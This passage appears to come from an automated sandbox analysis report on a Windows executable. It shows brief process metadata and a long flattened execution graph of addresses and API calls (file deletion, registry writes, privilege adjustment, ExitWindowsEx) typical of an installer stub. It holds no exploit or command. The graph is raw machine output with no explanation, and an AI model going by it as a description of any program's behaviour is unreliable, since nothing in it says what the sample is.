                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Disassembly

                                                                                                                              Reset < >

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:24.2%
                                                                                                                                Dynamic/Decrypted Code Coverage:13.6%
                                                                                                                                Signature Coverage:19.7%
                                                                                                                                Total number of Nodes:1545
                                                                                                                                Total number of Limit Nodes:44
                                                                                                                                execution_graph 4945 10001000 4948 1000101b 4945->4948 4955 10001516 4948->4955 4950 10001020 4951 10001024 4950->4951 4952 10001027 GlobalAlloc 4950->4952 4953 1000153d 3 API calls 4951->4953 4952->4951 4954 10001019 4953->4954 4957 1000151c 4955->4957 4956 10001522 4956->4950 4957->4956 4958 1000152e GlobalFree 4957->4958 4958->4950 3893 4015c1 3894 402c37 17 API calls 3893->3894 3895 4015c8 3894->3895 3912 405bfe CharNextW CharNextW 3895->3912 3897 401631 3898 401663 3897->3898 3899 401636 3897->3899 3903 401423 24 API calls 3898->3903 3926 401423 3899->3926 3900 405b80 CharNextW 3908 4015d1 3900->3908 3909 40165b 3903->3909 3907 40164a SetCurrentDirectoryW 3907->3909 3908->3897 3908->3900 3910 401617 GetFileAttributesW 3908->3910 3918 40584f 3908->3918 3921 4057b5 CreateDirectoryW 3908->3921 3930 405832 CreateDirectoryW 3908->3930 3910->3908 3913 405c1b 3912->3913 3917 405c2d 3912->3917 3914 405c28 CharNextW 3913->3914 3913->3917 3915 405c51 3914->3915 3915->3908 3916 405b80 CharNextW 3916->3917 3917->3915 3917->3916 3933 40665c GetModuleHandleA 3918->3933 3922 405802 3921->3922 3923 405806 GetLastError 3921->3923 3922->3908 3923->3922 3924 405815 SetFileSecurityW 3923->3924 3924->3922 3925 40582b GetLastError 3924->3925 3925->3922 3927 4052e6 24 API calls 3926->3927 3928 401431 3927->3928 3929 406282 lstrcpynW 3928->3929 3929->3907 3931 405842 3930->3931 3932 405846 GetLastError 3930->3932 3931->3908 3932->3931 3934 406682 GetProcAddress 3933->3934 3935 406678 3933->3935 3938 405856 3934->3938 3939 4065ec GetSystemDirectoryW 3935->3939 3937 40667e 3937->3934 3937->3938 3938->3908 3940 40660e wsprintfW LoadLibraryExW 3939->3940 3940->3937 3942 401941 3943 401943 3942->3943 3944 402c37 17 API calls 3943->3944 3945 401948 3944->3945 3948 405990 3945->3948 3987 405c5b 3948->3987 3951 4059b8 DeleteFileW 3953 401951 3951->3953 3952 4059cf 3954 405aef 3952->3954 4001 406282 lstrcpynW 3952->4001 3954->3953 4019 4065c5 FindFirstFileW 3954->4019 3956 4059f5 3957 405a08 3956->3957 3958 4059fb lstrcatW 3956->3958 4002 405b9f lstrlenW 3957->4002 3959 405a0e 3958->3959 3962 405a1e lstrcatW 3959->3962 3964 405a29 lstrlenW FindFirstFileW 3959->3964 3962->3964 3964->3954 3972 405a4b 3964->3972 3965 405b18 4022 405b53 lstrlenW CharPrevW 3965->4022 3968 405ad2 FindNextFileW 3968->3972 3973 405ae8 FindClose 3968->3973 3969 405948 5 API calls 3971 405b2a 3969->3971 3974 405b44 3971->3974 3975 405b2e 3971->3975 3972->3968 3981 405a93 3972->3981 4006 406282 lstrcpynW 3972->4006 3973->3954 3977 4052e6 24 API calls 3974->3977 3975->3953 3978 4052e6 24 API calls 3975->3978 3977->3953 3980 405b3b 3978->3980 3979 405990 60 API calls 3979->3981 3983 406048 36 API calls 3980->3983 3981->3968 3981->3979 3982 4052e6 24 API calls 3981->3982 3985 4052e6 24 API calls 3981->3985 4007 405948 3981->4007 4015 406048 MoveFileExW 3981->4015 3982->3968 3984 405b42 3983->3984 3984->3953 3985->3981 4025 406282 lstrcpynW 3987->4025 3989 405c6c 3990 405bfe 4 API calls 3989->3990 3991 405c72 3990->3991 3992 4059b0 3991->3992 3993 406516 5 API calls 3991->3993 3992->3951 3992->3952 3999 405c82 3993->3999 3994 405cb3 lstrlenW 3995 405cbe 3994->3995 3994->3999 3997 405b53 3 API calls 3995->3997 3996 4065c5 2 API calls 3996->3999 3998 405cc3 GetFileAttributesW 3997->3998 3998->3992 3999->3992 3999->3994 3999->3996 4000 405b9f 2 API calls 3999->4000 4000->3994 4001->3956 4003 405bad 4002->4003 4004 405bb3 CharPrevW 4003->4004 4005 405bbf 4003->4005 4004->4003 4004->4005 4005->3959 4006->3972 4026 405d4f GetFileAttributesW 4007->4026 4010 405975 4010->3981 4011 405963 RemoveDirectoryW 4013 405971 4011->4013 4012 40596b DeleteFileW 4012->4013 4013->4010 4014 405981 SetFileAttributesW 4013->4014 4014->4010 4016 406069 4015->4016 4017 40605c 4015->4017 4016->3981 4029 405ece 4017->4029 4020 4065db FindClose 4019->4020 4021 405b14 4019->4021 4020->4021 4021->3953 4021->3965 4023 405b1e 4022->4023 4024 405b6f lstrcatW 4022->4024 4023->3969 4024->4023 4025->3989 4027 405d61 SetFileAttributesW 4026->4027 4028 405954 4026->4028 4027->4028 4028->4010 4028->4011 4028->4012 4030 405f24 GetShortPathNameW 4029->4030 4031 405efe 4029->4031 4032 406043 4030->4032 4033 405f39 4030->4033 4056 405d74 GetFileAttributesW CreateFileW 4031->4056 4032->4016 4033->4032 4035 405f41 wsprintfA 4033->4035 4037 4062a4 17 API calls 4035->4037 4036 405f08 CloseHandle GetShortPathNameW 4036->4032 4038 405f1c 4036->4038 4039 405f69 4037->4039 4038->4030 4038->4032 4057 405d74 GetFileAttributesW CreateFileW 4039->4057 4041 405f76 4041->4032 4042 405f85 GetFileSize GlobalAlloc 4041->4042 4043 405fa7 4042->4043 4044 40603c CloseHandle 4042->4044 4058 405df7 ReadFile 4043->4058 4044->4032 4049 405fc6 lstrcpyA 4052 405fe8 4049->4052 4050 405fda 4051 405cd9 4 API calls 4050->4051 4051->4052 4053 40601f SetFilePointer 4052->4053 4065 405e26 WriteFile 4053->4065 4056->4036 4057->4041 4059 405e15 4058->4059 4059->4044 4060 405cd9 lstrlenA 4059->4060 4061 405d1a lstrlenA 4060->4061 4062 405d22 4061->4062 4063 405cf3 lstrcmpiA 4061->4063 4062->4049 4062->4050 4063->4062 4064 405d11 CharNextA 4063->4064 4064->4061 4066 405e44 GlobalFree 4065->4066 4066->4044 4070 401e43 4078 402c15 4070->4078 4072 401e49 4073 402c15 17 API calls 4072->4073 4074 401e55 4073->4074 4075 401e61 ShowWindow 4074->4075 4076 401e6c EnableWindow 4074->4076 4077 402abf 4075->4077 4076->4077 4079 4062a4 17 API calls 4078->4079 4080 402c2a 4079->4080 4080->4072 4959 402644 4960 402c15 17 API calls 4959->4960 4967 402653 4960->4967 4961 402790 4962 40269d ReadFile 4962->4961 4962->4967 4963 405df7 ReadFile 4963->4967 4965 402792 4981 4061c9 wsprintfW 4965->4981 4966 4026dd MultiByteToWideChar 4966->4967 4967->4961 4967->4962 4967->4963 4967->4965 4967->4966 4969 402703 SetFilePointer MultiByteToWideChar 4967->4969 4970 4027a3 4967->4970 4972 405e55 SetFilePointer 4967->4972 4969->4967 4970->4961 4971 4027c4 SetFilePointer 4970->4971 4971->4961 4973 405e71 4972->4973 4978 405e8d 4972->4978 4974 405df7 ReadFile 4973->4974 4975 405e7d 4974->4975 4976 405e96 SetFilePointer 4975->4976 4977 405ebe SetFilePointer 4975->4977 4975->4978 4976->4977 4979 405ea1 4976->4979 4977->4978 4978->4967 4980 405e26 WriteFile 4979->4980 4980->4978 4981->4961 4091 402348 4092 402c37 17 API calls 4091->4092 4093 402357 4092->4093 4094 402c37 17 API calls 4093->4094 4095 402360 4094->4095 4096 402c37 17 API calls 4095->4096 4097 40236a GetPrivateProfileStringW 4096->4097 4132 4014cb 4133 4052e6 24 API calls 4132->4133 4134 4014d2 4133->4134 4982 4016cc 4983 402c37 17 API calls 4982->4983 4984 4016d2 GetFullPathNameW 4983->4984 4985 40170e 4984->4985 4986 4016ec 4984->4986 4987 401723 GetShortPathNameW 4985->4987 4988 402abf 4985->4988 4986->4985 4989 4065c5 2 API calls 4986->4989 4987->4988 4990 4016fe 4989->4990 4990->4985 4992 406282 lstrcpynW 4990->4992 4992->4985 4993 401b4d 4994 402c37 17 API calls 4993->4994 4995 401b54 4994->4995 4996 402c15 17 API calls 4995->4996 4997 401b5d wsprintfW 4996->4997 4998 402abf 4997->4998 4999 40394e 5000 403959 4999->5000 5001 403960 GlobalAlloc 5000->5001 5002 40395d 5000->5002 5001->5002 5003 401f52 5004 402c37 17 API calls 5003->5004 5005 401f59 5004->5005 5006 4065c5 2 API calls 5005->5006 5007 401f5f 5006->5007 5009 401f70 5007->5009 5010 4061c9 wsprintfW 5007->5010 5010->5009 4135 402253 4136 402c37 17 API calls 4135->4136 4137 402259 4136->4137 4138 402c37 17 API calls 4137->4138 4139 402262 4138->4139 4140 402c37 17 API calls 4139->4140 4141 40226b 4140->4141 4142 4065c5 2 API calls 4141->4142 4143 402274 4142->4143 4144 402285 lstrlenW lstrlenW 4143->4144 4148 402278 4143->4148 4145 4052e6 24 API calls 4144->4145 4147 4022c3 SHFileOperationW 4145->4147 4146 4052e6 24 API calls 4149 402280 4146->4149 4147->4148 4147->4149 4148->4146 5011 401956 5012 402c37 17 API calls 5011->5012 5013 40195d lstrlenW 5012->5013 5014 40258c 5013->5014 4150 4014d7 4151 402c15 17 API calls 4150->4151 4152 4014dd Sleep 4151->4152 4154 402abf 4152->4154 5015 4022d7 5016 4022de 5015->5016 5020 4022f1 5015->5020 5017 4062a4 17 API calls 5016->5017 5018 4022eb 5017->5018 5019 4058e4 MessageBoxIndirectW 5018->5019 5019->5020 5021 401d57 GetDlgItem GetClientRect 5022 402c37 17 API calls 5021->5022 5023 401d89 LoadImageW SendMessageW 5022->5023 5024 401da7 DeleteObject 5023->5024 5025 402abf 5023->5025 5024->5025 5026 402dd7 5027 402e02 5026->5027 5028 402de9 SetTimer 5026->5028 5029 402e57 5027->5029 5030 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5027->5030 5028->5027 5030->5029 5031 40525a 5032 40526a 5031->5032 5033 40527e 5031->5033 5034 405270 5032->5034 5043 4052c7 5032->5043 5035 405286 IsWindowVisible 5033->5035 5039 40529d 5033->5039 5037 404263 SendMessageW 5034->5037 5038 405293 5035->5038 5035->5043 5036 4052cc CallWindowProcW 5040 40527a 5036->5040 5037->5040 5044 404bb0 SendMessageW 5038->5044 5039->5036 5049 404c30 5039->5049 5043->5036 5045 404bd3 GetMessagePos ScreenToClient SendMessageW 5044->5045 5046 404c0f SendMessageW 5044->5046 5047 404c07 5045->5047 5048 404c0c 5045->5048 5046->5047 5047->5039 5048->5046 5058 406282 lstrcpynW 5049->5058 5051 404c43 5059 4061c9 wsprintfW 5051->5059 5053 404c4d 5054 40140b 2 API calls 5053->5054 5055 404c56 5054->5055 5060 406282 lstrcpynW 5055->5060 5057 404c5d 5057->5043 5058->5051 5059->5053 5060->5057 4177 40175c 4178 402c37 17 API calls 4177->4178 4179 401763 4178->4179 4183 405da3 4179->4183 4181 40176a 4182 405da3 2 API calls 4181->4182 4182->4181 4184 405db0 GetTickCount GetTempFileNameW 4183->4184 4185 405dea 4184->4185 4186 405de6 4184->4186 4185->4181 4186->4184 4186->4185 4187 4023de 4188 402c37 17 API calls 4187->4188 4189 4023f0 4188->4189 4190 402c37 17 API calls 4189->4190 4191 4023fa 4190->4191 4204 402cc7 4191->4204 4194 402432 4197 40243e 4194->4197 4198 402c15 17 API calls 4194->4198 4195 402885 4196 402c37 17 API calls 4200 402428 lstrlenW 4196->4200 4199 40245d RegSetValueExW 4197->4199 4208 4030fa 4197->4208 4198->4197 4202 402473 RegCloseKey 4199->4202 4200->4194 4202->4195 4205 402ce2 4204->4205 4228 40611d 4205->4228 4210 403113 4208->4210 4209 403141 4232 403315 4209->4232 4210->4209 4235 40332b SetFilePointer 4210->4235 4214 4032ae 4216 4032f0 4214->4216 4220 4032b2 4214->4220 4215 40315e GetTickCount 4219 403298 4215->4219 4227 4031ad 4215->4227 4218 403315 ReadFile 4216->4218 4217 403315 ReadFile 4217->4227 4218->4219 4219->4199 4220->4219 4221 403315 ReadFile 4220->4221 4222 405e26 WriteFile 4220->4222 4221->4220 4222->4220 4223 403203 GetTickCount 4223->4227 4224 403228 MulDiv wsprintfW 4225 4052e6 24 API calls 4224->4225 4225->4227 4226 405e26 WriteFile 4226->4227 4227->4217 4227->4219 4227->4223 4227->4224 4227->4226 4229 40612c 4228->4229 4230 40240a 4229->4230 4231 406137 RegCreateKeyExW 4229->4231 4230->4194 4230->4195 4230->4196 4231->4230 4233 405df7 ReadFile 4232->4233 4234 40314c 4233->4234 4234->4214 4234->4215 4234->4219 4235->4209 4236 402862 4237 402c37 17 API calls 4236->4237 4238 402869 FindFirstFileW 4237->4238 4239 402891 4238->4239 4242 40287c 4238->4242 4244 4061c9 wsprintfW 4239->4244 4241 40289a 4245 406282 lstrcpynW 4241->4245 4244->4241 4245->4242 5061 404c62 GetDlgItem GetDlgItem 5062 404cb4 7 API calls 5061->5062 5067 404ecd 5061->5067 5063 404d57 DeleteObject 5062->5063 5064 404d4a SendMessageW 5062->5064 5065 404d60 5063->5065 5064->5063 5066 404d97 5065->5066 5071 4062a4 17 API calls 5065->5071 5068 404217 18 API calls 5066->5068 5070 404fb1 5067->5070 5077 404bb0 5 API calls 5067->5077 5094 404f3e 5067->5094 5074 404dab 5068->5074 5069 40505d 5072 405067 SendMessageW 5069->5072 5076 40506f 5069->5076 5070->5069 5079 40500a SendMessageW 5070->5079 5104 404ec0 5070->5104 5073 404d79 SendMessageW SendMessageW 5071->5073 5072->5076 5073->5065 5078 404217 18 API calls 5074->5078 5075 404fa3 SendMessageW 5075->5070 5082 405081 ImageList_Destroy 5076->5082 5083 405088 5076->5083 5090 405098 5076->5090 5077->5094 5095 404db9 5078->5095 5085 40501f SendMessageW 5079->5085 5079->5104 5080 40427e 8 API calls 5081 405253 5080->5081 5082->5083 5086 405091 GlobalFree 5083->5086 5083->5090 5084 405207 5091 405219 ShowWindow GetDlgItem ShowWindow 5084->5091 5084->5104 5088 405032 5085->5088 5086->5090 5087 404e8e GetWindowLongW SetWindowLongW 5089 404ea7 5087->5089 5099 405043 SendMessageW 5088->5099 5092 404ec5 5089->5092 5093 404ead ShowWindow 5089->5093 5090->5084 5103 404c30 4 API calls 5090->5103 5108 4050d3 5090->5108 5091->5104 5113 40424c SendMessageW 5092->5113 5112 40424c SendMessageW 5093->5112 5094->5070 5094->5075 5095->5087 5098 404e09 SendMessageW 5095->5098 5100 404e88 5095->5100 5101 404e45 SendMessageW 5095->5101 5102 404e56 SendMessageW 5095->5102 5098->5095 5099->5069 5100->5087 5100->5089 5101->5095 5102->5095 5103->5108 5104->5080 5105 4051dd InvalidateRect 5105->5084 5106 4051f3 5105->5106 5114 404b6b 5106->5114 5107 405101 SendMessageW 5111 405117 5107->5111 5108->5107 5108->5111 5110 40518b SendMessageW SendMessageW 5110->5111 5111->5105 5111->5110 5112->5104 5113->5067 5117 404aa2 5114->5117 5116 404b80 5116->5084 5120 404abb 5117->5120 5118 4062a4 17 API calls 5119 404b1f 5118->5119 5121 4062a4 17 API calls 5119->5121 5120->5118 5122 404b2a 5121->5122 5123 4062a4 17 API calls 5122->5123 5124 404b40 lstrlenW wsprintfW SetDlgItemTextW 5123->5124 5124->5116 5125 401563 5126 402a65 5125->5126 5129 4061c9 wsprintfW 5126->5129 5128 402a6a 5129->5128 5130 404365 lstrlenW 5131 404384 5130->5131 5132 404386 WideCharToMultiByte 5130->5132 5131->5132 5133 4046e6 5134 404712 5133->5134 5135 404723 5133->5135 5194 4058c8 GetDlgItemTextW 5134->5194 5136 40472f GetDlgItem 5135->5136 5139 40478e 5135->5139 5138 404743 5136->5138 5143 404757 SetWindowTextW 5138->5143 5146 405bfe 4 API calls 5138->5146 5140 404872 5139->5140 5148 4062a4 17 API calls 5139->5148 5192 404a21 5139->5192 5140->5192 5196 4058c8 GetDlgItemTextW 5140->5196 5141 40471d 5142 406516 5 API calls 5141->5142 5142->5135 5147 404217 18 API calls 5143->5147 5145 40427e 8 API calls 5150 404a35 5145->5150 5151 40474d 5146->5151 5152 404773 5147->5152 5153 404802 SHBrowseForFolderW 5148->5153 5149 4048a2 5154 405c5b 18 API calls 5149->5154 5151->5143 5157 405b53 3 API calls 5151->5157 5155 404217 18 API calls 5152->5155 5153->5140 5156 40481a CoTaskMemFree 5153->5156 5160 4048a8 5154->5160 5158 404781 5155->5158 5159 405b53 3 API calls 5156->5159 5157->5143 5195 40424c SendMessageW 5158->5195 5162 404827 5159->5162 5197 406282 lstrcpynW 5160->5197 5165 40485e SetDlgItemTextW 5162->5165 5169 4062a4 17 API calls 5162->5169 5164 404787 5168 40665c 5 API calls 5164->5168 5165->5140 5166 4048bf 5167 40665c 5 API calls 5166->5167 5175 4048c6 5167->5175 5168->5139 5170 404846 lstrcmpiW 5169->5170 5170->5165 5172 404857 lstrcatW 5170->5172 5171 404907 5198 406282 lstrcpynW 5171->5198 5172->5165 5174 40490e 5176 405bfe 4 API calls 5174->5176 5175->5171 5180 405b9f 2 API calls 5175->5180 5181 40495f 5175->5181 5177 404914 GetDiskFreeSpaceW 5176->5177 5179 404938 MulDiv 5177->5179 5177->5181 5179->5181 5180->5175 5182 4049d0 5181->5182 5184 404b6b 20 API calls 5181->5184 5183 4049f3 5182->5183 5185 40140b 2 API calls 5182->5185 5199 404239 KiUserCallbackDispatcher 5183->5199 5186 4049bd 5184->5186 5185->5183 5187 4049d2 SetDlgItemTextW 5186->5187 5188 4049c2 5186->5188 5187->5182 5190 404aa2 20 API calls 5188->5190 5190->5182 5191 404a0f 5191->5192 5200 40463f 5191->5200 5192->5145 5194->5141 5195->5164 5196->5149 5197->5166 5198->5174 5199->5191 5201 404652 SendMessageW 5200->5201 5202 40464d 5200->5202 5201->5192 5202->5201 5203 401968 5204 402c15 17 API calls 5203->5204 5205 40196f 5204->5205 5206 402c15 17 API calls 5205->5206 5207 40197c 5206->5207 5208 402c37 17 API calls 5207->5208 5209 401993 lstrlenW 5208->5209 5210 4019a4 5209->5210 5214 4019e5 5210->5214 5215 406282 lstrcpynW 5210->5215 5212 4019d5 5213 4019da lstrlenW 5212->5213 5212->5214 5213->5214 5215->5212 5216 100018a9 5217 100018cc 5216->5217 5218 10001911 5217->5218 5219 100018ff GlobalFree 5217->5219 5220 10001272 2 API calls 5218->5220 5219->5218 5221 10001a87 GlobalFree GlobalFree 5220->5221 5222 4027e9 5223 4027f0 5222->5223 5225 402a6a 5222->5225 5224 402c15 17 API calls 5223->5224 5226 4027f7 5224->5226 5227 402806 SetFilePointer 5226->5227 5227->5225 5228 402816 5227->5228 5230 4061c9 wsprintfW 5228->5230 5230->5225 5231 40166a 5232 402c37 17 API calls 5231->5232 5233 401670 5232->5233 5234 4065c5 2 API calls 5233->5234 5235 401676 5234->5235 5236 401ced 5237 402c15 17 API calls 5236->5237 5238 401cf3 IsWindow 5237->5238 5239 401a20 5238->5239 4512 40176f 4513 402c37 17 API calls 4512->4513 4514 401776 4513->4514 4515 401796 4514->4515 4516 40179e 4514->4516 4552 406282 lstrcpynW 4515->4552 4553 406282 lstrcpynW 4516->4553 4519 40179c 4522 406516 5 API calls 4519->4522 4520 4017a9 4521 405b53 3 API calls 4520->4521 4523 4017af lstrcatW 4521->4523 4540 4017bb 4522->4540 4523->4519 4524 4065c5 2 API calls 4524->4540 4525 4017f7 4526 405d4f 2 API calls 4525->4526 4526->4540 4528 4017cd CompareFileTime 4528->4540 4529 40188d 4530 4052e6 24 API calls 4529->4530 4532 401897 4530->4532 4531 401864 4533 4052e6 24 API calls 4531->4533 4550 401879 4531->4550 4535 4030fa 31 API calls 4532->4535 4533->4550 4534 406282 lstrcpynW 4534->4540 4536 4018aa 4535->4536 4537 4018be SetFileTime 4536->4537 4539 4018d0 CloseHandle 4536->4539 4537->4539 4538 4062a4 17 API calls 4538->4540 4541 4018e1 4539->4541 4539->4550 4540->4524 4540->4525 4540->4528 4540->4529 4540->4531 4540->4534 4540->4538 4551 405d74 GetFileAttributesW CreateFileW 4540->4551 4554 4058e4 4540->4554 4542 4018e6 4541->4542 4543 4018f9 4541->4543 4544 4062a4 17 API calls 4542->4544 4545 4062a4 17 API calls 4543->4545 4547 4018ee lstrcatW 4544->4547 4548 401901 4545->4548 4547->4548 4549 4058e4 MessageBoxIndirectW 4548->4549 4549->4550 4551->4540 4552->4519 4553->4520 4555 4058f9 4554->4555 4556 405945 4555->4556 4557 40590d MessageBoxIndirectW 4555->4557 4556->4540 4557->4556 5240 402570 5241 402c37 17 API calls 5240->5241 5242 402577 5241->5242 5245 405d74 GetFileAttributesW CreateFileW 5242->5245 5244 402583 5245->5244 4558 401b71 4559 401bc2 4558->4559 4560 401b7e 4558->4560 4561 401bc7 4559->4561 4562 401bec GlobalAlloc 4559->4562 4563 401c07 4560->4563 4568 401b95 4560->4568 4572 4022f1 4561->4572 4579 406282 lstrcpynW 4561->4579 4564 4062a4 17 API calls 4562->4564 4565 4062a4 17 API calls 4563->4565 4563->4572 4564->4563 4567 4022eb 4565->4567 4571 4058e4 MessageBoxIndirectW 4567->4571 4577 406282 lstrcpynW 4568->4577 4569 401bd9 GlobalFree 4569->4572 4571->4572 4573 401ba4 4578 406282 lstrcpynW 4573->4578 4575 401bb3 4580 406282 lstrcpynW 4575->4580 4577->4573 4578->4575 4579->4569 4580->4572 5246 401a72 5247 402c15 17 API calls 5246->5247 5248 401a78 5247->5248 5249 402c15 17 API calls 5248->5249 5250 401a20 5249->5250 5251 4024f2 5252 402c77 17 API calls 5251->5252 5253 4024fc 5252->5253 5254 402c15 17 API calls 5253->5254 5255 402505 5254->5255 5256 402521 RegEnumKeyW 5255->5256 5257 40252d RegEnumValueW 5255->5257 5259 402885 5255->5259 5258 402542 RegCloseKey 5256->5258 5257->5258 5258->5259 4581 403373 SetErrorMode GetVersion 4582 4033b2 4581->4582 4583 4033b8 4581->4583 4584 40665c 5 API calls 4582->4584 4585 4065ec 3 API calls 4583->4585 4584->4583 4586 4033ce lstrlenA 4585->4586 4586->4583 4587 4033de 4586->4587 4588 40665c 5 API calls 4587->4588 4589 4033e5 4588->4589 4590 40665c 5 API calls 4589->4590 4591 4033ec 4590->4591 4592 40665c 5 API calls 4591->4592 4593 4033f8 #17 OleInitialize SHGetFileInfoW 4592->4593 4672 406282 lstrcpynW 4593->4672 4596 403444 GetCommandLineW 4673 406282 lstrcpynW 4596->4673 4598 403456 GetModuleHandleW 4599 40346e 4598->4599 4600 405b80 CharNextW 4599->4600 4601 40347d CharNextW 4600->4601 4602 4035a7 GetTempPathW 4601->4602 4610 403496 4601->4610 4674 403342 4602->4674 4604 4035bf 4605 4035c3 GetWindowsDirectoryW lstrcatW 4604->4605 4606 403619 DeleteFileW 4604->4606 4607 403342 12 API calls 4605->4607 4684 402ec1 GetTickCount GetModuleFileNameW 4606->4684 4611 4035df 4607->4611 4608 405b80 CharNextW 4608->4610 4610->4608 4616 403592 4610->4616 4618 403590 4610->4618 4611->4606 4613 4035e3 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4611->4613 4612 40362d 4614 4036e0 4612->4614 4619 4036d0 4612->4619 4624 405b80 CharNextW 4612->4624 4617 403342 12 API calls 4613->4617 4771 4038b6 4614->4771 4768 406282 lstrcpynW 4616->4768 4622 403611 4617->4622 4618->4602 4712 403990 4619->4712 4622->4606 4622->4614 4636 40364c 4624->4636 4625 40381a 4628 403822 GetCurrentProcess OpenProcessToken 4625->4628 4629 40389e ExitProcess 4625->4629 4626 4036fa 4627 4058e4 MessageBoxIndirectW 4626->4627 4633 403708 ExitProcess 4627->4633 4634 40383a LookupPrivilegeValueW AdjustTokenPrivileges 4628->4634 4635 40386e 4628->4635 4631 403710 4638 40584f 5 API calls 4631->4638 4632 4036aa 4637 405c5b 18 API calls 4632->4637 4634->4635 4639 40665c 5 API calls 4635->4639 4636->4631 4636->4632 4640 4036b6 4637->4640 4641 403715 lstrcatW 4638->4641 4642 403875 4639->4642 4640->4614 4769 406282 lstrcpynW 4640->4769 4643 403731 lstrcatW lstrcmpiW 4641->4643 4644 403726 lstrcatW 4641->4644 4645 40388a ExitWindowsEx 4642->4645 4646 403897 4642->4646 4643->4614 4648 40374d 4643->4648 4644->4643 4645->4629 4645->4646 4780 40140b 4646->4780 4651 403752 4648->4651 4652 403759 4648->4652 4650 4036c5 4770 406282 lstrcpynW 4650->4770 4655 4057b5 4 API calls 4651->4655 4653 405832 2 API calls 4652->4653 4657 40375e SetCurrentDirectoryW 4653->4657 4656 403757 4655->4656 4656->4657 4658 403779 4657->4658 4659 40376e 4657->4659 4779 406282 lstrcpynW 4658->4779 4778 406282 lstrcpynW 4659->4778 4662 4062a4 17 API calls 4663 4037b8 DeleteFileW 4662->4663 4664 4037c5 CopyFileW 4663->4664 4669 403787 4663->4669 4664->4669 4665 40380e 4666 406048 36 API calls 4665->4666 4666->4614 4667 406048 36 API calls 4667->4669 4668 4062a4 17 API calls 4668->4669 4669->4662 4669->4665 4669->4667 4669->4668 4670 405867 2 API calls 4669->4670 4671 4037f9 CloseHandle 4669->4671 4670->4669 4671->4669 4672->4596 4673->4598 4675 406516 5 API calls 4674->4675 4676 40334e 4675->4676 4677 403358 4676->4677 4678 405b53 3 API calls 4676->4678 4677->4604 4679 403360 4678->4679 4680 405832 2 API calls 4679->4680 4681 403366 4680->4681 4682 405da3 2 API calls 4681->4682 4683 403371 4682->4683 4683->4604 4783 405d74 GetFileAttributesW CreateFileW 4684->4783 4686 402f01 4705 402f11 4686->4705 4784 406282 lstrcpynW 4686->4784 4688 402f27 4689 405b9f 2 API calls 4688->4689 4690 402f2d 4689->4690 4785 406282 lstrcpynW 4690->4785 4692 402f38 GetFileSize 4693 403034 4692->4693 4711 402f4f 4692->4711 4786 402e5d 4693->4786 4695 40303d 4697 40306d GlobalAlloc 4695->4697 4695->4705 4798 40332b SetFilePointer 4695->4798 4696 403315 ReadFile 4696->4711 4797 40332b SetFilePointer 4697->4797 4700 4030a0 4702 402e5d 6 API calls 4700->4702 4701 403088 4704 4030fa 31 API calls 4701->4704 4702->4705 4703 403056 4706 403315 ReadFile 4703->4706 4709 403094 4704->4709 4705->4612 4708 403061 4706->4708 4707 402e5d 6 API calls 4707->4711 4708->4697 4708->4705 4709->4705 4709->4709 4710 4030d1 SetFilePointer 4709->4710 4710->4705 4711->4693 4711->4696 4711->4700 4711->4705 4711->4707 4713 40665c 5 API calls 4712->4713 4714 4039a4 4713->4714 4715 4039aa 4714->4715 4716 4039bc 4714->4716 4807 4061c9 wsprintfW 4715->4807 4717 406150 3 API calls 4716->4717 4718 4039ec 4717->4718 4720 403a0b lstrcatW 4718->4720 4722 406150 3 API calls 4718->4722 4721 4039ba 4720->4721 4799 403c66 4721->4799 4722->4720 4725 405c5b 18 API calls 4726 403a3d 4725->4726 4727 403ad1 4726->4727 4729 406150 3 API calls 4726->4729 4728 405c5b 18 API calls 4727->4728 4730 403ad7 4728->4730 4731 403a6f 4729->4731 4732 403ae7 LoadImageW 4730->4732 4733 4062a4 17 API calls 4730->4733 4731->4727 4736 403a90 lstrlenW 4731->4736 4740 405b80 CharNextW 4731->4740 4734 403b8d 4732->4734 4735 403b0e RegisterClassW 4732->4735 4733->4732 4739 40140b 2 API calls 4734->4739 4737 403b44 SystemParametersInfoW CreateWindowExW 4735->4737 4738 403b97 4735->4738 4741 403ac4 4736->4741 4742 403a9e lstrcmpiW 4736->4742 4737->4734 4738->4614 4743 403b93 4739->4743 4744 403a8d 4740->4744 4746 405b53 3 API calls 4741->4746 4742->4741 4745 403aae GetFileAttributesW 4742->4745 4743->4738 4749 403c66 18 API calls 4743->4749 4744->4736 4748 403aba 4745->4748 4747 403aca 4746->4747 4808 406282 lstrcpynW 4747->4808 4748->4741 4752 405b9f 2 API calls 4748->4752 4750 403ba4 4749->4750 4753 403bb0 ShowWindow 4750->4753 4754 403c33 4750->4754 4752->4741 4755 4065ec 3 API calls 4753->4755 4756 4053b9 5 API calls 4754->4756 4760 403bc8 4755->4760 4757 403c39 4756->4757 4758 403c55 4757->4758 4761 403c3d 4757->4761 4762 40140b 2 API calls 4758->4762 4759 403bd6 GetClassInfoW 4764 403c00 DialogBoxParamW 4759->4764 4765 403bea GetClassInfoW RegisterClassW 4759->4765 4760->4759 4763 4065ec 3 API calls 4760->4763 4761->4738 4766 40140b 2 API calls 4761->4766 4762->4738 4763->4759 4767 40140b 2 API calls 4764->4767 4765->4764 4766->4738 4767->4738 4768->4618 4769->4650 4770->4619 4772 4038c0 CloseHandle 4771->4772 4773 4038ce 4771->4773 4772->4773 4813 4038fb 4773->4813 4776 405990 67 API calls 4777 4036e9 OleUninitialize 4776->4777 4777->4625 4777->4626 4778->4658 4779->4669 4781 401389 2 API calls 4780->4781 4782 401420 4781->4782 4782->4629 4783->4686 4784->4688 4785->4692 4787 402e66 4786->4787 4788 402e7e 4786->4788 4789 402e76 4787->4789 4790 402e6f DestroyWindow 4787->4790 4791 402e86 4788->4791 4792 402e8e GetTickCount 4788->4792 4789->4695 4790->4789 4793 406698 2 API calls 4791->4793 4794 402e9c CreateDialogParamW ShowWindow 4792->4794 4795 402ebf 4792->4795 4796 402e8c 4793->4796 4794->4795 4795->4695 4796->4695 4797->4701 4798->4703 4800 403c7a 4799->4800 4809 4061c9 wsprintfW 4800->4809 4802 403ceb 4810 403d1f 4802->4810 4804 403a1b 4804->4725 4805 403cf0 4805->4804 4806 4062a4 17 API calls 4805->4806 4806->4805 4807->4721 4808->4727 4809->4802 4811 4062a4 17 API calls 4810->4811 4812 403d2d SetWindowTextW 4811->4812 4812->4805 4814 403909 4813->4814 4815 40390e FreeLibrary 